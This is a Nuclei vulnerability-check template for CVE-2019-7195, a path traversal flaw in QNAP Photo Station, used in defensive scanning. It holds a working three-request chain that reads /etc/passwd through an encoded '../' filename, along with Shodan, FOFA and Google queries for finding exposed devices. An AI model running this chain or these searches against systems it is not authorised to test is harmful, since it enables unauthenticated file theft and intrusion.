id: CVE-2019-7195

info:
  name: QNAP Photo Station - Path Traversal
  author: s4e-io
  severity: critical
  description: |
    QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.
  impact: |
    Unauthenticated attackers can exploit path traversal to access or modify system files, potentially reading sensitive configuration files and credentials.
  remediation: |
    Upgrade to QNAP Photo Station version that addresses this vulnerability or apply vendor-provided patches.
  reference:
    - https://cycrafttechnology.medium.com/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
    - https://packetstorm.news/files/id/157857
    - https://github.com/cycraft-corp/cve-2019-7192-check
    - https://github.com/qazbnm456/awesome-cve-poc
    - https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7195
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7195
    cwe-id: CWE-22
    epss-score: 0.9411
    epss-percentile: 0.99914
    cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
  metadata:
    vendor: qnap
    product: photo_station
    shodan-query:
      - content-length:"580 "http server 1.0""
      - http.title:"photo station"
      - http.title:"qnap"
    fofa-query:
      - title="photo station"
      - title="qnap"
    google-query:
      - intitle:"photo station"
      - intitle:"qnap"
  tags: cve,cve2019,kev,qnap,lfi,vkev,vuln

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f={{to_lower(rand_text_alpha(5))}}

      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    matchers:
      - type: dsl
        dsl:
          - "status_code_3 == 200"
          - "regex('admin:', body_3)"
          - "contains_all(header_3, 'video/subtitle', 'filename=')"
        condition: and

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true
# digest: 4a0a004730450220555f210213f44f2966fc17d9a41f9ecda6f98c4fe73c05fe6c7eea21a9e5144f022100ca58feea28dd92543771a95822d454f36a5bcda3357a68c1f87fc719ce907e7b:922c64590222798bb761d5b6d8e72950